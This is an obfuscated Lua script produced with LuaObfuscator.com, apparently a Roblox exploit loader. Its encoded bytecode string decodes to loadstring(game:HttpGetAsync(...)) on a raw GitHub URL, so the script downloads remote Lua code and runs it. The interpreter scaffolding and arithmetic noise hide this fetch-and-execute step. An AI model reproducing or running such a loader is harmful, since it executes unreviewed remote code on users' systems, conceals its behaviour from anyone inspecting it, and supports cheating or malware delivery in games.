--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.2) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v70=v2(v0(v20,16));if v19 then local v77=0;local v78;while true do if (v77==1) then return v78;end if (v77==0) then v78=v5(v70,v19);v19=nil;v77=1;end end else return v70;end end end);local function v21(v22,v23,v24)if v24 then local v71=1629 -(1413 + 216);local v72;while true do if (v71==(0 -(0 + 0))) then v72=(v22/((1643 -(1030 + 611))^(v23-(2 -1))))%((1714 -(1448 + (295 -(23 + 8))))^(((v24-1) -(v23-(1821 -(1192 + 628)))) + 1 + (510 -(151 + 359))));return v72-(v72%(1 + 0));end end else local v73=(1388 -(931 + 455))^(v23-(1 + 0));return (((v22%(v73 + v73))>=v73) and (1 + 0)) or (792 -(291 + 501));end end local function v25()local v38=0 + 0;local v39;while true do if (v38==((2 -1) + 0)) then return v39;end if (v38==(1754 -(236 + 1518))) then v39=v1(v16,v18,v18);v18=v18 + (1624 -(1051 + 572));v38=1;end end end local function v26()local v40=0 -0;local v41;local v42;while true do if (v40==(1 + 0)) then return (v42 * (425 -169)) + v41;end if (v40==(1287 -(672 + 615))) then v41,v42=v1(v16,v18,v18 + (2 -0));v18=v18 + (5 -(2 + 1));v40=1053 -(609 + 443);end end end local function v27()local v43,v44,v45,v46=v1(v16,v18,v18 + (1797 -(1611 + 183)));v18=v18 + 1 + 3;return (v46 * (52821401 -(36045295 -(1071 + 39)))) + (v45 * (155232 -89696)) + (v44 * (32 + 139 + 85)) + v43;end local function v28()local v47=v27();local v48=v27();local v49=1;local v50=(v21(v48,1181 -(941 + 239),1679 -(107 + 1552)) * ((291 -(251 + 38))^(43 -(9 + 2)))) + v47;local v51=v21(v48,21 + 0,30 + 1);local v52=((v21(v48,(267 -109) -(73 + 53))==(434 -((1348 -(270 + 810)) + 165))) and  -((2124 -(51 + 179)) -((2529 -1596) + 960))) or (1 + 0);if (v51==(0 -(1385 -(485 + 900)))) then if (v50==(0 -0)) then return v52 * (0 -0);else v51=1;v49=1638 -(30 + 1608);end elseif (v51==(8319 -6272)) then return ((v50==(0 + 0)) and (v52 * ((120 -(19 + 100))/(739 -(130 + 609))))) or (v52 * NaN);end return v8(v52,v51-((7061 -3663) -2375)) * (v49 + (v50/((717 -(376 + 339))^(1758 -(142 + 1564)))));end local function v29(v30)local v53=752 -(79 + (2538 -(179 + 1686)));local v54;local v55;while true do if (v53==(1 + 0)) then v54=v3(v16,v18,(v18 + v30) -(694 -(369 + 324)));v18=v18 + v30;v53=3 -1;end if (v53==(7 -4)) then return v6(v55);end if (v53==(0 -(0 + 0))) then v54=nil;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v53=842 -(252 + 589);end if (v53==(943 -((2450 -1716) + 207))) then v55={};for v79=440 -(344 + (264 -169)), #v54 do v55[v79]=v2(v1(v3(v54,v79,v79)));end v53=1 + 2;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v56=0 -0;local v57;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v56==(1441 -(468 + 971))) then v61=nil;v62=nil;v56=3;end if ((0 -0)==v56) then v57=0;v58=nil;v56=1258 -(67 + 1190);end if (v56==1) then v59=nil;v60=nil;v56=2;end if (v56==4) then v65=nil;while true do if (v57==3) then local v87=0 + 0;while true do if (v87==0) then v64=nil;v65=nil;v87=1;end if (v87~=(1 + 0)) then else v57=132 -(70 + 58);break;end end end if (v57==1) then v60=nil;v61=nil;v57=2;end if (v57~=0) then else local v88=0;while true do if (v88~=0) then else v58=0 + 0;v59=nil;v88=1;end if (1==v88) then v57=1;break;end end end if (v57==(2 + 0)) then local v89=439 -(316 + 123);while true do if ((3 -2)~=v89) then else v57=1 + 2;break;end if ((0 -0)==v89) then v62=nil;v63=nil;v89=1;end end end if (v57==4) then while true do if (v58~=(1159 -(1123 + 36))) then else v59=0 -0;v60=nil;v58=1 + 0;end if (v58==2) then local v100=70 -(28 + 42);while true do if ((1818 -(1435 + 383))~=v100) then else v63=nil;v64=nil;v100=954 -(714 + 239);end if (v100==(766 -(369 + 396))) then v58=3;break;end end end if (v58==1) then v61=nil;v62=nil;v58=2;end if (v58==(4 -1)) then v65=nil;while true do local v105=0 -0;while true do if (v105~=(1 + 0)) then else if ((1426 -(49 + 1376))==v59) then local v111=0 -0;while true do if (v111~=0) then else v64=v27();v65={};v111=1;end if (v111~=1) then else local v114=0 -0;while true do if (v114==(1 + 0)) then v111=1 + 1;break;end if (v114==(0 -0)) then for v139=1,v64 do local v140=0 + 0;local v141;local v142;local v143;while true do if (v140~=1) then else v143=nil;while true do if (0==v141) then local v153=0 + 0;while true do if (v153==(0 + 0)) then v142=v25();v143=nil;v153=679 -(535 + 143);end if (v153~=(396 -(267 + 128))) then else v141=1;break;end end end if (v141==(2 -1)) then if (v142==(1 -0)) then v143=v25()~=0;elseif (v142==(1 + 1)) then v143=v28();elseif (v142==(3 + 0)) then v143=v29();end v65[v139]=v143;break;end end break;end if (v140~=(539 -(32 + 507))) then else v141=1072 -(385 + 687);v142=nil;v140=1;end end end v63[475 -(428 + 44)]=v25();v114=2 -1;end end end if (v111==(1 + 1)) then v59=3 -1;break;end end end break;end if (v105==(411 -(237 + 174))) then local v110=0;while true do if (v110==0) then if (v59==0) then local v115=0;while true do if ((1778 -(1282 + 494))==v115) then v59=2 -1;break;end if (v115~=(0 + 0)) then else local v120=0 -0;while true do if (1==v120) then v115=1 + 0;break;end if (v120~=(751 -(131 + 620))) then else v60={};v61={};v120=1;end end end if (v115==(1500 -(354 + 1145))) then local v121=0 -0;while true do if (v121==(0 + 0)) then v62={};v63={v60,v61,nil,v62};v121=897 -(766 + 130);end if (v121==1) then v115=1 + 1;break;end end end end end if ((3 -1)==v59) then local v116=0 + 0;local v117;local v118;while true do if (v116~=(2 -1)) then else while true do if (v117==(0 -0)) then v118=0 -0;while true do local v148=0 -0;while true do if (v148~=(0 -0)) then else if (v118~=(1968 -(9 + 1958))) then else for v163=1,v27() do v62[v163]=v27();end return v63;end if (v118==0) then local v158=0;local v159;while true do if ((0 -0)==v158) then v159=0;while true do if (v159~=(1 + 0)) then else v118=1 + 0;break;end if (v159==(0 -0)) then for v167=1,v27() do local v168=0 + 0;local v169;local v170;while true do if (v168==0) then v169=0;v170=nil;v168=1;end if (v168~=1) then else while true do if (v169==0) then v170=v25();if (v21(v170,1,919 -(815 + 103))==(437 -(91 + 346))) then local v173=0;local v174;local v175;local v176;local v177;while true do if (v173~=1) then else local v178=0;while true do if (1~=v178) then else v173=2;break;end if (v178~=(0 + 0)) then else v176=nil;v177=nil;v178=1671 -(916 + 754);end end end if (v173~=0) then else local v179=0 -0;while true do if (v179==(2 -1)) then v173=3 -2;break;end if (v179==0) then v174=813 -(474 + 339);v175=nil;v179=1;end end end if (v173==(968 -(188 + 778))) then while true do if (v174==(81 -(13 + 65))) then if (v21(v176,6 -3,1891 -(13 + 1875))==(127 -(73 + 53))) then v177[1530 -(889 + 637)]=v65[v177[114 -(94 + 16)]];end v60[v167]=v177;break;end if ((1465 -(609 + 856))==v174) then local v181=0;local v182;local v183;while true do if ((2 -1)==v181) then while true do if (v182==0) then v183=0 + 0;while true do if (v183==(1 + 0)) then v174=1;break;end if (v183==0) then local v195=0;local v196;while true do if (v195==0) then v196=1214 -(31 + 1183);while true do if (v196~=(0 + 0)) then else local v201=0;while true do if (v201==0) then v175=v21(v170,4 -2,1606 -(385 + 1218));v176=v21(v170,4,5 + 1);v201=1;end if (v201==(2 -1)) then v196=306 -(171 + 134);break;end end end if ((1 + 0)~=v196) then else v183=1;break;end end break;end end end end break;end end break;end if (v181==0) then v182=0;v183=nil;v181=1;end end end if ((2 -1)==v174) then local v184=0;while true do if (v184~=1) then else v174=7 -5;break;end if (v184==(0 + 0)) then local v188=0;local v189;while true do if (v188~=(0 + 0)) then else v189=0 + 0;while true do if ((1 + 0)==v189) then v184=1;break;end if (v189~=0) then else local v197=0 -0;while true do if ((963 -(655 + 307))==v197) then v189=1 + 0;break;end if (v197~=(0 -0)) then else v177={v26(),v26(),nil,nil};if (v175==0) then local v198=204 -(132 + 72);local v199;local v200;while true do if (v198==(1 + 0)) then while true do if (v199==0) then v200=0;while true do if (v200==(0 + 0)) then v177[3]=v26();v177[831 -(646 + 181)]=v26();break;end end break;end end break;end if (v198~=0) then else v199=0;v200=nil;v198=1;end end elseif (v175==(1 + 0)) then v177[4 -1]=v27();elseif (v175==(300 -(55 + 243))) then v177[3]=v27() -((2 + 0)^16);elseif (v175==3) then local v204=0;local v205;while true do if (v204~=(215 -(57 + 158))) then else v205=1446 -(1165 + 281);while true do if ((0 + 0)~=v205) then else v177[3]=v27() -(2^(15 + 1));v177[4]=v26();break;end end break;end end end v197=4 -3;end end end end break;end end end end end if (2==v174) then local v185=0 + 0;while true do if (v185~=(1510 -(1317 + 192))) then else v174=2 + 1;break;end if (0==v185) then local v190=0 -0;while true do if (v190==1) then v185=1;break;end if (0~=v190) then else if (v21(v176,1,1)~=(2 -1)) then else v177[2]=v65[v177[2 + 0]];end if (v21(v176,2,2)~=1) then else v177[3 + 0]=v65[v177[1 + 2]];end v190=1;end end end end end end break;end end end break;end end break;end end end for v171=1,v27() do v61[v171-1]=v33();end v159=1;end end break;end end end break;end end end break;end end break;end if (v116~=(0 -0)) then else v117=0;v118=nil;v116=228 -(186 + 41);end end end v110=1;end if (v110==(1 + 0)) then v105=1992 -(338 + 1653);break;end end end end end break;end end break;end end break;end if (v56~=3) then else v63=nil;v64=nil;v56=4;end end end local function v34(v35,v36,v37)local v66=0;local v67;local v68;local v69;while true do if (0==v66) then v67=v35[1];v68=v35[2];v66=1;end if (v66==1) then v69=v35[3];return function(...)local v81=0;local v82;local v83;local v84;local v85;local v86;while true do if (v81==3) then A,B=v32(v11(v86));if  not A[1] then local v101=v35[4][v82] or "?";error("Script error at ["   .. v101   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end if (v81==1) then v84={...};v85=v12("#",...) -1;v81=2;end if (v81==0) then v82=1;v83= -1;v81=1;end if (v81==2) then v86=nil;v86=function()local v90=v67;local v91=v68;local v92=v69;local v93=v32;local v94={};local v95={};local v96={};for v102=1344 -((2150 -(909 + 187)) + 290),v85 do if ((v102>=v92) or ((1260 + 2394)<(4980 -2649))) then v94[v102-v92]=v84[v102 + 1];else v96[v102]=v84[v102 + (1807 -(1339 + 467))];end end local v97=(v85-v92) + 1 + 0;local v98;local v99;while true do local v103=(0 -0) + 0;local v104;while true do if (((2345 -(223 + 1490))<=(4996 -(161 + 1031))) and (v103==0)) then v104=0;while true do if ((v104==(2 -1)) or ((1658 -(609 + (907 -208)))>=1563)) then if ((243<=1531) and (v99<=(3 -1))) then if (((5496 -(1008 + 840))==(11680 -8032)) and (v99<=0)) then v96[v98[(4257 -2431) -(1688 + 136)]]();elseif (((5080 -(710 + 266))>(3353 -1140)) and (v99==(1468 -(259 + 1208)))) then v96[v98[2 + 0 + 0]]=v37[v98[3 + 0]];else local v124=0;local v125;local v126;while true do if (((1966 -(359 + 1606))==v124) or (676>((14020 -8586) -3507))) then v96[v125 + 1 + 0]=v126;v96[v125]=v126[v98[2 + 1 + 1]];break;end if ((v124==(0 -0)) or ((9200 -5336)<(6074 -3302))) then local v147=0;while true do if ((v147==(608 -(6 + 602))) or ((1469 + 815)>(3119 -(92 + 498)))) then v125=v98[1397 -(1340 + 55)];v126=v96[v98[1 + 2]];v147=1530 -(879 + 650);end if ((4892>(3482 -(164 + 69))) and (v147==(1 + 0))) then v124=1 + 0;break;end end end end end elseif ((241<=(6827 -5063)) and (v99<=(8 -4))) then if ((v99==(8 -5)) or ((493 + 962)>=(5444 -(8750 -6337)))) then v96[v98[1780 -(1688 + 90)]]=v98[1276 -(574 + 699)];else do return;end end elseif (((2248 -(211 + 155))<(1494 + 2814)) and (v99>5)) then local v129=0 + 0;local v130;local v131;local v132;local v133;local v134;while true do if ((v129==(0 + 0 + 0)) or ((211 + 27)>=(12989 -9124))) then v130=0 -0;v131=nil;v129=1676 -(72 + 1603);end if (((2 -1)==v129) or ((187 + 4374)<=(1 + 3230))) then v132=nil;v133=nil;v129=4 -2;end if ((((2589 + 2626) -(802 + 140))>3475) and (v129==(3 -1))) then v134=nil;while true do if ((v130==(1 + 1)) or (4816<(2024 -(630 + 568)))) then for v155=v131,v83 do local v156=0 + 0;local v157;while true do if ((v156==(0 + 0)) or (3178<(689 -347))) then v157=0 -(969 -(751 + 218));while true do if ((v157==(1828 -(432 + 1396))) or ((4843 -3777)>(4500 -(362 + 79)))) then v134=v134 + 1 + 0;v96[v155]=v132[v134];break;end end break;end end end break;end if ((((4969 -(13 + 700)) -(1237 + 522))<4764) and (v130==(0 -0))) then local v151=0 + 0;while true do if (((359 -(144 + 185))==(97 -67)) and (v151==(1 + 0))) then v130=1;break;end if (((794 -477)<=(4353 + (2204 -(370 + 1350)))) and (v151==0)) then v131=v98[1851 -(1048 + 801)];v132,v133=v93(v96[v131](v13(v96,v131 + 1,v98[1849 -(1480 + 325 + (113 -72))])));v151=1;end end end if ((v130==(2 -1)) or ((2521 -(361 + 224))>=2469)) then v83=(v133 + v131) -(1 + 0 + 0);v134=1058 -(445 + 613);v130=1 + 1;end end break;end end else local v135=828 -(806 + 18 + 4);local v136;local v137;local v138;while true do if (((4795 -(151 + 17))>(14798 -10516)) and (v135==(0 + 0))) then v136=0 + 0;v137=nil;v135=1 + 0 + 0;end if ((((7616 -4924) + 2287)>((5838 -(102 + 292)) -(805 + 575))) and (v135==1)) then v138=nil;while true do if ((v136==(0 -0)) or (1206>=(3647 -1262))) then local v152=(4899 -3091) -(1323 + 485);while true do if ((v152==(0 -0)) or ((2661 -(70 + 481 + 83))>=(2925 -(86 + 342)))) then v137=(1776 -(627 + 1149)) + 0;v138=nil;v152=1 + 0;end if (((3124 -(9 + 1478))<=(19604 -14889)) and (v152==(1 + 0))) then v136=2 -1;break;end end end if (((1 -(1556 -(91 + 1465)))==v136) or (3039<=(54 + (1121 -(378 + 506))))) then while true do if (((6019 -3504)>=(2292 -(594 + 160 + 421))) and (v137==(1041 -(815 + (1642 -(291 + 1125)))))) then v138=v98[2];v96[v138]=v96[v138](v13(v96,v138 + 1,v83));break;end end break;end end break;end end end v82=v82 + (1251 -(442 + 808));break;end if (((2978 + 395)==((16206 -11581) -(396 + 856))) and (v104==(592 -(348 + (956 -712))))) then v98=v90[v82];v99=v98[2 -1];v104=1;end end break;end end end end;v81=3;end end end;end end end return v34(v33(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F542O6F6C73706F702F6C6F6C2F6D61696E2F6B632O672E6C756100083O0012013O00013O001201000100023O002002000100010003001203000300044O0006000100034O00055O00026O000100012O00043O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
